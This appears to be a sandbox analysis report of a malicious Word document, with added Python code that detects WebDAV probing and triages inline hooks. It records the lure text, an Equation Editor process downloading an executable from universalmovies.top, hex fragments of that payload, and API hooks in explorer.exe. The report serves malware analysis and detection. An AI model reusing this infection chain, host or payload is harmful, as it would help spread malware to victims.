2024-06-25 13:13:54 UTC  530 bytes  IN
Data Ascii: {\rtf1{\*\7bNZnNrrw8Gw4tjQ8OTnXusuSauwGlmKNomDEwVxZX9yvWDpP8OYkoeFUOirZfcI4welD8UJeqYgxujOP1930nOvkovn4Fc1kQjsls45hTGkBvXJdSWvMmO6jGKPmR3fufqCu5XSGp3pdVwidqIrofvw08hMk8EN62jOgdBYsJhZMYCmvZFUQNFa4poIzFPJszC78SHX3L0cNxcd24ATCngCUlTsXgrdjt12GS}{\49645196
2024-06-25 13:13:54 UTC  1369 bytes  IN
Data Ascii: financial statements, professional standards require that auditors obtain an understanding of internal controls to the extent necessary to plan the audit. Auditors use this understanding of internal controls to assess the risk of material misstatement of
2024-06-25 13:13:54 UTC  1369 bytes  IN
Data Ascii: that internal controls would not prevent or detect and correct the misstatements. One common example of a deficiency in internal control that’s severe enough to be considered a material weakness or significant deficiency is when an organization lacks the
2024-06-25 13:13:54 UTC  1369 bytes  IN
Data Ascii: d must continue to be communicated in writing until the deficiency is corrected.Other internal control deficiencies identified during the audit that are not considered severe enough to be significant deficiencies or material weaknesses need not be communi
2024-06-25 13:13:54 UTC  1369 bytes  IN
Data Ascii: prompt continued monitoring by management or those charged with governance.During the course of an audit, the auditors might also identify other matters that aren’t considered deficiencies in internal control, but are opportunities for strengthening proce
2024-06-25 13:13:54 UTC  1369 bytes  IN
Data Ascii: harged with governance with valuable information regarding their organization. Used properly, the Management Letter can be a beneficial tool for assisting management or those charged with governance in fulfilling their responsibilities%44%6F%63%75%6D%65%6
2024-06-25 13:13:54 UTC  1369 bytes  IN
Data Ascii: %6C%20%69%6E%74%65%72%61%63%74%69%6F%6E%73%20%74%6F%20%70%72%6F%6D%6F%74%65%20%74%68%65%20%70%72%6F%64%75%63%74%73%20%61%6E%64%20%73%65%72%76%69%63%65%73%2E%20%47%75%65%72%69%6C%6C%61%20%6D%61%72%6B%65%74%69%6E%67%20%73%74%72%61%74%65%67%79%20%69%73%20%70
2024-06-25 13:13:54 UTC  1369 bytes  IN
Data Ascii: 65%72%73%74%61%6E%64%69%6E%67%20%74%68%65%20%63%75%73%74%6F%6D%65%72%27%73%20%70%72%69%63%65%20%61%6E%64%20%62%6C%6C%20please click Enable editing from the yellow bar above.The independent auditors’ opinion says the financial statements are fairly stated
2024-06-25 13:13:54 UTC  1369 bytes  IN
Data Ascii: nsidered to be deficient.Auditors evaluate each internal control deficiency noted during the audit to determine whether the deficiency, or a combination of deficiencies, is severe enough to be considered a material weakness or significant deficiency. In a
2024-06-25 13:13:54 UTC  1369 bytes  IN
Data Ascii: financial statements often find it cost prohibitive to remedy the deficiency by training current employees or by hiring additional employees or another service provider to prepare them. Nonprofits may opt to document their explanation via a Management Res


Session ID: 6  Source IP: 192.168.2.22  Source Port: 49172  Destination IP: 172.67.162.95  Destination Port: 443  PID: 2732  Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
2024-06-25 13:13:55 UTC  147 bytes  OUT
HEAD /nelb.doc HTTP/1.1
User-Agent: Microsoft Office Existence Discovery
Host: universalmovies.top
Content-Length: 0
Connection: Keep-Alive
2024-06-25 13:13:55 UTC  841 bytes  IN
HTTP/1.1 200 OK
Date: Tue, 25 Jun 2024 13:13:55 GMT
Content-Type: application/msword
Content-Length: 574773
Connection: close
Last-Modified: Tue, 25 Jun 2024 07:45:34 GMT
ETag: "667a759e-8c535"
Expires: Thu, 31 Dec 2037 23:55:55 GMT
Cache-Control: max-age=315360000
CF-Cache-Status: HIT
Age: 18284
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S%2BVkqvddtwXlnc7mRb3iMC5FQmDWSUPWPCNHp1hH%2FI3rgo5uXDCQh6BQ0xqdpAAHtzHjOiNjDIesEuGTpQdY%2B0Wv4E1ZoOl3hk2coaQeYIx6P6sO6M2gar7MYmeqI4PwrgrZuM%2Fg"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Strict-Transport-Security: max-age=0; includeSubDomains; preload
X-Content-Type-Options: nosniff
Server: cloudflare
CF-RAY: 899537ba4cebc425-EWR
alt-svc: h3=":443"; ma=86400


Session ID: 7  Source IP: 192.168.2.22  Source Port: 49173  Destination IP: 104.21.74.191  Destination Port: 443  PID: 3156  Process: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
2024-06-25 13:13:56 UTC  314 bytes  OUT
GET /nelb.scr HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: universalmovies.top
Connection: Keep-Alive
2024-06-25 13:13:56 UTC  771 bytes  IN
HTTP/1.1 200 OK
Date: Tue, 25 Jun 2024 13:13:56 GMT
Content-Type: application/x-silverlight
Content-Length: 628736
Connection: close
Last-Modified: Tue, 25 Jun 2024 07:42:57 GMT
ETag: "99800-61bb20bd72002"
Accept-Ranges: bytes
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cn9vdpokojka9zBITaXz2mLVj6t31YIFN1zV1V%2BbVD2fNU83GM1ouR8KR78wA8gEWURMH9mukO8174d1ivi7mX4%2FjwUaeItskRH0Q53sJmTo%2F4zBHahOGbfVFle4sLkh2r2%2BWMpR"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Strict-Transport-Security: max-age=0; includeSubDomains; preload
X-Content-Type-Options: nosniff
Server: cloudflare
CF-RAY: 899537c10e1a0f37-EWR
alt-svc: h3=":443"; ma=86400
2024-06-25 13:13:56 UTC  598 bytes  IN
Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELS0 @ @
                                                                              Data Ascii: {o/{s0o4{o2{ s(o){rOpo*{Us+o,{o-{o3{rOpo.{o/{o2{ s(o){ripo*{Us+o,{o
                                                                              2024-06-25 13:13:56 UTC1369INData Raw: 00 0a 6f 29 00 00 0a 00 02 7b 1d 00 00 04 72 41 02 00 70 6f 2a 00 00 0a 00 02 7b 1d 00 00 04 1f 64 1f 14 73 2b 00 00 0a 6f 2c 00 00 0a 00 02 7b 1d 00 00 04 1f 17 6f 2d 00 00 0a 00 02 7b 1e 00 00 04 20 d2 00 00 00 20 e8 00 00 00 73 28 00 00 0a 6f 29 00 00 0a 00 02 7b 1e 00 00 04 72 53 02 00 70 6f 2a 00 00 0a 00 02 7b 1e 00 00 04 1f 64 1f 14 73 2b 00 00 0a 6f 2c 00 00 0a 00 02 7b 1e 00 00 04 1f 18 6f 2d 00 00 0a 00 02 7b 1f 00 00 04 20 a0 00 00 00 20 e8 00 00 00 73 28 00 00 0a 6f 29 00 00 0a 00 02 7b 1f 00 00 04 72 65 02 00 70 6f 2a 00 00 0a 00 02 7b 1f 00 00 04 1f 64 1f 14 73 2b 00 00 0a 6f 2c 00 00 0a 00 02 7b 1f 00 00 04 1f 19 6f 2d 00 00 0a 00 02 7b 20 00 00 04 20 5a 01 00 00 20 0c 01 00 00 73 28 00 00 0a 6f 29 00 00 0a 00 02 7b 20 00 00 04 72 77 02 00
                                                                              Data Ascii: o){rApo*{ds+o,{o-{ s(o){rSpo*{ds+o,{o-{ s(o){repo*{ds+o,{o-{ Z s(o){ rw
                                                                              2024-06-25 13:13:56 UTC1369INData Raw: 02 7b 26 00 00 04 6f 3b 00 00 0a 00 02 28 3a 00 00 0a 02 7b 25 00 00 04 6f 3b 00 00 0a 00 02 28 3a 00 00 0a 02 7b 24 00 00 04 6f 3b 00 00 0a 00 02 28 3a 00 00 0a 02 7b 23 00 00 04 6f 3b 00 00 0a 00 02 28 3a 00 00 0a 02 7b 22 00 00 04 6f 3b 00 00 0a 00 02 28 3a 00 00 0a 02 7b 21 00 00 04 6f 3b 00 00 0a 00 02 28 3a 00 00 0a 02 7b 20 00 00 04 6f 3b 00 00 0a 00 02 28 3a 00 00 0a 02 7b 1f 00 00 04 6f 3b 00 00 0a 00 02 28 3a 00 00 0a 02 7b 1e 00 00 04 6f 3b 00 00 0a 00 02 28 3a 00 00 0a 02 7b 1d 00 00 04 6f 3b 00 00 0a 00 02 28 3a 00 00 0a 02 7b 1c 00 00 04 6f 3b 00 00 0a 00 02 28 3a 00 00 0a 02 7b 1b 00 00 04 6f 3b 00 00 0a 00 02 28 3a 00 00 0a 02 7b 1a 00 00 04 6f 3b 00 00 0a 00 02 28 3a 00 00 0a 02 7b 19 00 00 04 6f 3b 00 00 0a 00 02 28 3a 00 00 0a 02 7b 18
                                                                              Data Ascii: {&o;(:{%o;(:{$o;(:{#o;(:{"o;(:{!o;(:{ o;(:{o;(:{o;(:{o;(:{o;(:{o;(:{o;(:{o;(:{
                                                                              2024-06-25 13:13:56 UTC1369INData Raw: 00 28 24 00 00 06 28 24 00 00 06 28 17 00 00 06 0a 06 0b 2b 00 07 2a 00 13 30 05 00 9c 01 00 00 00 00 00 00 72 a7 03 00 70 d0 63 00 00 01 28 48 00 00 0a d0 09 00 00 02 28 48 00 00 0a 16 8c 63 00 00 01 1f 10 73 49 00 00 0a 28 4a 00 00 0a 80 39 00 00 04 72 bb 03 00 70 d0 63 00 00 01 28 48 00 00 0a d0 09 00 00 02 28 48 00 00 0a 16 8c 63 00 00 01 1f 12 73 49 00 00 0a 28 4a 00 00 0a 80 3a 00 00 04 72 cf 03 00 70 d0 63 00 00 01 28 48 00 00 0a d0 09 00 00 02 28 48 00 00 0a 17 8c 63 00 00 01 1f 12 73 49 00 00 0a 28 4a 00 00 0a 80 3b 00 00 04 72 e7 03 00 70 d0 02 00 00 1b 28 48 00 00 0a d0 09 00 00 02 28 48 00 00 0a 14 1f 10 73 49 00 00 0a 28 4a 00 00 0a 80 3c 00 00 04 72 03 04 00 70 d0 63 00 00 01 28 48 00 00 0a d0 09 00 00 02 28 48 00 00 0a 16 8c 63 00 00 01 1f
                                                                              Data Ascii: ($($(+*0rpc(H(HcsI(J9rpc(H(HcsI(J:rpc(H(HcsI(J;rp(H(HsI(J<rpc(H(Hc
                                                                              2024-06-25 13:13:56 UTC1369INData Raw: 7e 41 00 00 04 03 02 6f 74 00 00 0a de 0a 07 2c 06 06 28 72 00 00 0a dc 2a 00 00 01 10 00 00 02 00 08 00 23 2b 00 0a 00 00 00 00 13 30 04 00 42 00 00 00 13 00 00 11 02 28 32 00 00 06 17 33 2f 23 00 00 00 00 00 00 14 40 23 00 00 00 00 00 00 10 40 23 00 00 00 00 00 00 14 40 23 00 00 00 00 00 00 10 40 73 75 00 00 0a 73 76 00 00 0a 2a 12 00 fe 15 03 00 00 1b 06 2a 00 00 13 30 08 00 b8 12 00 00 14 00 00 11 02 28 77 00 00 0a 0a 02 28 32 00 00 06 16 fe 01 0b 02 28 2c 00 00 06 2c 08 02 28 78 00 00 0a 2b 01 16 25 2c 08 02 28 28 00 00 06 2b 01 16 0c 2c 08 02 28 2a 00 00 06 2b 01 16 0d 02 28 2e 00 00 06 13 04 12 04 28 79 00 00 0a 13 05 02 28 30 00 00 06 13 06 08 2d 0e 09 2d 0b 11 05 2d 07 11 06 16 fe 01 2b 01 16 13 07 1f 13 28 3e 00 00 06 07 39 88 00 00 00 12 0a fe
                                                                              Data Ascii: ~Aot,(r*#+0B(23/#@#@#@#@susv**0(w(2(,,(x+%,((+,(*+(.(y(0---+(>9
                                                                              2024-06-25 13:13:56 UTC1369INData Raw: 23 9a 99 99 99 99 99 d9 3f 73 88 00 00 0a 6f 89 00 00 0a 11 09 6f 86 00 00 0a 20 ff 00 00 00 20 bd 00 00 00 20 ed 00 00 00 20 ff 00 00 00 28 87 00 00 0a 23 9a 99 99 99 99 99 d9 3f 73 88 00 00 0a 6f 89 00 00 0a 11 09 6f 86 00 00 0a 20 ff 00 00 00 20 b7 00 00 00 20 e7 00 00 00 20 fb 00 00 00 28 87 00 00 0a 23 00 00 00 00 00 00 f0 3f 73 88 00 00 0a 6f 89 00 00 0a 38 cc 00 00 00 11 09 6f 86 00 00 0a 20 ff 00 00 00 20 f2 00 00 00 20 f9 00 00 00 20 fc 00 00 00 28 87 00 00 0a 23 00 00 00 00 00 00 00 00 73 88 00 00 0a 6f 89 00 00 0a 11 09 6f 86 00 00 0a 20 ff 00 00 00 20 f2 00 00 00 20 f9 00 00 00 20 fc 00 00 00 28 87 00 00 0a 23 9a 99 99 99 99 99 d9 3f 73 88 00 00 0a 6f 89 00 00 0a 11 09 6f 86 00 00 0a 20 ff 00 00 00 20 e1 00 00 00 20 f1 00 00 00 20 f9 00 00 00
                                                                              Data Ascii: #?soo (#?soo (#?so8o (#soo (#?soo


Session ID: 8 | Source IP: 192.168.2.22 | Source Port: 49174 | Destination IP: 172.67.162.95 | Destination Port: 443
Timestamp | Bytes transferred | Direction | Data
2024-06-25 13:14:01 UTC | 166 | OUT | Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 75 6e 69 76 65 72 73 61 6c 6d 6f 76 69 65 73 2e 74 6f 70 0d 0a 0d 0a
Data Ascii (CRLF-separated request, shown one header per line):
PROPFIND / HTTP/1.1
Connection: Keep-Alive
User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
Depth: 0
translate: f
Content-Length: 0
Host: universalmovies.top

2024-06-25 13:14:01 UTC | 734 | IN | HTTP/1.1 405 Method Not Allowed
                                                                              Date: Tue, 25 Jun 2024 13:14:01 GMT
                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Allow: HEAD,GET,POST,OPTIONS,TRACE
                                                                              CF-Cache-Status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=agdJLl1InpF7eDH3JCmH2NZUDgJVCFu1P5R27hFY4BA%2B6j9TMC1iVWOMH6i5n0782FJ%2F20AfbhbpUhqsOXCkHZyn4r0D9M04kEi%2FLi9x2VI0UGU%2F09P5wdvpF7nFpfzuDzV9FO5x"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                                              X-Content-Type-Options: nosniff
                                                                              Server: cloudflare
                                                                              CF-RAY: 899537dcebfa42db-EWR
                                                                              alt-svc: h3=":443"; ma=86400
2024-06-25 13:14:01 UTC | 231 | IN | Data Raw: 65 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 50 52 4f 50 46 49 4e 44 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
Data Ascii (one HTTP chunk of 0xe1 bytes, line breaks restored):
e1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>405 Method Not Allowed</title>
</head><body>
<h1>Method Not Allowed</h1>
<p>The requested method PROPFIND is not allowed for this URL.</p>
</body></html>

2024-06-25 13:14:01 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0 (terminating zero-length chunk)


Session ID: 9 | Source IP: 192.168.2.22 | Source Port: 49175 | Destination IP: 172.67.162.95 | Destination Port: 443
Timestamp | Bytes transferred | Direction | Data
2024-06-25 13:14:03 UTC | 166 | OUT | Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 75 6e 69 76 65 72 73 61 6c 6d 6f 76 69 65 73 2e 74 6f 70 0d 0a 0d 0a
Data Ascii (CRLF-separated request, shown one header per line; identical to session 8):
PROPFIND / HTTP/1.1
Connection: Keep-Alive
User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
Depth: 0
translate: f
Content-Length: 0
Host: universalmovies.top

2024-06-25 13:14:03 UTC | 734 | IN | HTTP/1.1 405 Method Not Allowed
                                                                              Date: Tue, 25 Jun 2024 13:14:03 GMT
                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Allow: HEAD,GET,POST,OPTIONS,TRACE
                                                                              CF-Cache-Status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1QV31jp148TcCX162%2B8Rvx2YKfOCtVmEnQ%2FO76FyLNI9kVIOb99e2kQKe6SJ%2FUPF5AQP7kLOfuzfNuYb7txzbq234nROcxvQ4kMLOGgo25L2r4TlnhUWB748m9eL%2FCADKwEVn2kz"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                                              X-Content-Type-Options: nosniff
                                                                              Server: cloudflare
                                                                              CF-RAY: 899537ea8de272ad-EWR
                                                                              alt-svc: h3=":443"; ma=86400
2024-06-25 13:14:03 UTC | 231 | IN | Data Raw: 65 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 50 52 4f 50 46 49 4e 44 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
Data Ascii (one HTTP chunk of 0xe1 bytes, line breaks restored; identical to session 8):
e1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>405 Method Not Allowed</title>
</head><body>
<h1>Method Not Allowed</h1>
<p>The requested method PROPFIND is not allowed for this URL.</p>
</body></html>

2024-06-25 13:14:03 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0 (terminating zero-length chunk)
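
Sessions 8 and 9 above are the same exchange twice: the Windows WebDAV Mini-Redirector, driven by Office's ms-search/WebDAV handler, sends PROPFIND to universalmovies.top and gets a 405 whose Allow header omits PROPFIND, so the host is a plain HTTP server behind Cloudflare, not a WebDAV share. The detection value is on the client side of the record. The following is an added example, not part of the Joe Sandbox report and not vendor code: it decodes the request from the report's "Data Raw" hex column (copied from session 8), parses it, and scores it. The scoring thresholds and the helper names are this example's own choices.

```python
"""Decode and assess the captured WebDAV PROPFIND (added example, not report code)."""
import ipaddress
from dataclasses import dataclass
from typing import Dict, List, Tuple

# The 166-byte OUT record of session 8, copied from the report's "Data Raw" column,
# laid out one header per line so each line can be checked against the Data Ascii view.
SESSION8_OUT_HEX = """
50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a
43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a
55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a
44 65 70 74 68 3a 20 30 0d 0a
74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a
43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a
48 6f 73 74 3a 20 75 6e 69 76 65 72 73 61 6c 6d 6f 76 69 65 73 2e 74 6f 70 0d 0a
0d 0a
"""


def decode_raw_column(hex_text: str) -> bytes:
    """Turn the report's space-separated 'Data Raw' hex column into bytes."""
    return bytes.fromhex("".join(hex_text.split()))


@dataclass
class HttpRequest:
    method: str
    target: str
    version: str
    headers: Dict[str, str]  # names lower-cased, values stripped


def parse_http_request(raw: bytes) -> HttpRequest:
    """Minimal HTTP/1.x request parser: request line plus headers; the body is ignored."""
    head, _sep, _body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return HttpRequest(method, target, version, headers)


def is_external(ip_text: str) -> bool:
    """True for addresses outside private, loopback and link-local space."""
    ip = ipaddress.ip_address(ip_text)
    return not (ip.is_private or ip.is_loopback or ip.is_link_local)


def webdav_supported(allow_header: str) -> bool:
    """Does the server's Allow header (from a 405) advertise any WebDAV method?"""
    methods = {m.strip().upper() for m in allow_header.split(",")}
    return bool(methods & {"PROPFIND", "PROPPATCH", "MKCOL", "LOCK", "UNLOCK"})


def assess_webdav_request(req: HttpRequest, dst_ip: str) -> Tuple[str, List[str]]:
    """Return (verdict, reasons). Thresholds are this example's choice, not a vendor rule."""
    reasons: List[str] = []
    ua = req.headers.get("user-agent", "")
    if ua.startswith("Microsoft-WebDAV-MiniRedir/"):
        reasons.append("client is the Windows WebDAV Mini-Redirector: an application opened a UNC/WebDAV path, not a browser")
    if req.method == "PROPFIND":
        reasons.append("PROPFIND: the client is enumerating a remote share before fetching from it")
    if req.headers.get("translate", "").lower() == "f":
        reasons.append("'translate: f': the Microsoft client asks for the raw file rather than a rendered page")
    if is_external(dst_ip):
        reasons.append(f"destination {dst_ip} is not an internal address; corporate WebDAV shares live in RFC1918 space")
    if len(reasons) >= 3:
        return "suspicious", reasons
    return ("review" if reasons else "benign"), reasons


if __name__ == "__main__":
    request = parse_http_request(decode_raw_column(SESSION8_OUT_HEX))
    verdict, why = assess_webdav_request(request, "172.67.162.95")
    print(request.method, request.headers["host"], verdict)
    for reason in why:
        print(" -", reason)
    # Allow header copied from the 405 response above: no WebDAV method at all.
    print("server speaks WebDAV:", webdav_supported("HEAD,GET,POST,OPTIONS,TRACE"))
```

When hunting for this in proxy or IDS logs, key on the Mini-Redirector user agent plus PROPFIND to a non-internal host; a 405 or other failure does not make the record benign, because the document has already caused Office to reach out, and the same host can serve the next stage over a plain GET.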


                                                                              Code Manipulations

Function Name | Hook Type | Active in Processes
PeekMessageA | INLINE | explorer.exe
PeekMessageW | INLINE | explorer.exe
GetMessageW | INLINE | explorer.exe
GetMessageA | INLINE | explorer.exe

Function Name | Hook Type | New Data
PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x80 0x0E 0xEB
PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x88 0x8E 0xEB
GetMessageW | INLINE | 0x48 0x8B 0xB8 0x88 0x8E 0xEB
GetMessageA | INLINE | 0x48 0x8B 0xB8 0x80 0x0E 0xEB
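
The table above records user-mode inline hooks on the message-loop APIs of the 64-bit explorer.exe: the first bytes of each export no longer match the on-disk image. The usual way to confirm such a hook outside a sandbox is to read the function prologue from the live process and compare it with the same bytes in the clean module, then decode whatever trampoline the hook wrote. The following is an added example, not report or vendor code: it takes the table's "New Data" rows as input, compares them with a reference prologue, and decodes the common x64 trampolines. The CLEAN_PROLOGUE bytes are placeholders standing in for what you would read from user32.dll on disk, and the function names are this example's own.

```python
"""Triage inline hooks from prologue bytes (added example, not report code)."""
import struct
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Rows copied from the report's Code Manipulations table: (function, hook type, process, new data).
REPORT_HOOKS = [
    ("PeekMessageA", "INLINE", "explorer.exe", "0x48 0x8B 0xB8 0x80 0x0E 0xEB"),
    ("PeekMessageW", "INLINE", "explorer.exe", "0x48 0x8B 0xB8 0x88 0x8E 0xEB"),
    ("GetMessageW", "INLINE", "explorer.exe", "0x48 0x8B 0xB8 0x88 0x8E 0xEB"),
    ("GetMessageA", "INLINE", "explorer.exe", "0x48 0x8B 0xB8 0x80 0x0E 0xEB"),
]

# ASSUMPTION: placeholder reference prologues. In a real check these come from the
# mapped on-disk user32.dll (or a known-clean process); they are not the real exports' code.
CLEAN_PROLOGUE: Dict[str, bytes] = {
    name: bytes.fromhex("4883ec38488bc2") for name, _, _, _ in REPORT_HOOKS
}

MASK64 = (1 << 64) - 1


def parse_new_data(column: str) -> bytes:
    """'0x48 0x8B ...' as printed in the report -> bytes."""
    return bytes(int(tok, 16) for tok in column.split())


@dataclass
class HookFinding:
    function: str
    process: str
    verdict: str
    target: Optional[int] = None  # where the trampoline transfers control, if decodable


def decode_trampoline(mem: bytes, func_va: int) -> Optional[Tuple[str, int]]:
    """Recognise the trampolines inline hooks usually write and compute their target."""
    if len(mem) >= 5 and mem[0] == 0xE9:                       # jmp rel32
        rel = struct.unpack_from("<i", mem, 1)[0]
        return "jmp rel32", (func_va + 5 + rel) & MASK64
    if len(mem) >= 6 and mem[:2] == b"\xFF\x25":               # jmp [rip+rel32]
        rel = struct.unpack_from("<i", mem, 2)[0]
        return "jmp [rip+rel32] (pointer slot)", (func_va + 6 + rel) & MASK64
    if len(mem) >= 12 and mem[:2] == b"\x48\xB8" and mem[10:12] == b"\xFF\xE0":
        return "mov rax, imm64; jmp rax", struct.unpack_from("<Q", mem, 2)[0]
    if len(mem) >= 6 and mem[0] == 0x68 and mem[5] == 0xC3:    # push imm32; ret
        return "push imm32; ret", struct.unpack_from("<I", mem, 1)[0]
    return None


def classify(function: str, process: str, mem: bytes, clean: bytes, func_va: int = 0) -> HookFinding:
    """Compare the overlapping prefix of live and clean prologues; any difference is a hook."""
    n = min(len(mem), len(clean))
    if n and mem[:n] == clean[:n]:
        return HookFinding(function, process, "clean")
    tramp = decode_trampoline(mem, func_va)
    if tramp:
        kind, target = tramp
        return HookFinding(function, process, f"inline hook: {kind}", target)
    return HookFinding(function, process, "inline hook: prologue rewritten, no standard trampoline opcode")


def triage_report(rows, clean_prologues: Dict[str, bytes]) -> List[HookFinding]:
    return [classify(fn, proc, parse_new_data(nd), clean_prologues[fn]) for fn, _, proc, nd in rows]


if __name__ == "__main__":
    for finding in triage_report(REPORT_HOOKS, CLEAN_PROLOGUE):
        print(f"{finding.process}!{finding.function}: {finding.verdict}")
    # Constructed jmp-style hook at a made-up address, to show target decoding.
    demo = classify("Demo", "x.exe", bytes.fromhex("e900010000") + b"\x90",
                    bytes.fromhex("4883ec28"), 0x7FF800001000)
    print(demo.verdict, hex(demo.target))
```

Two caveats a practitioner would add: compare against the module mapped from disk after applying relocations, or a clean process's copy, not a raw file read, or every relocated pointer shows up as a "hook"; and a rewritten prologue that is not a recognisable jump (as in the rows above) still needs a disassembler to see where control goes, the byte comparison only proves that something was written there.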


                                                                              Target ID:0
                                                                              Start time:09:13:38
                                                                              Start date:25/06/2024
                                                                              Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                                                              Imagebase:0x13f280000
                                                                              File size:1'423'704 bytes
                                                                              MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:9
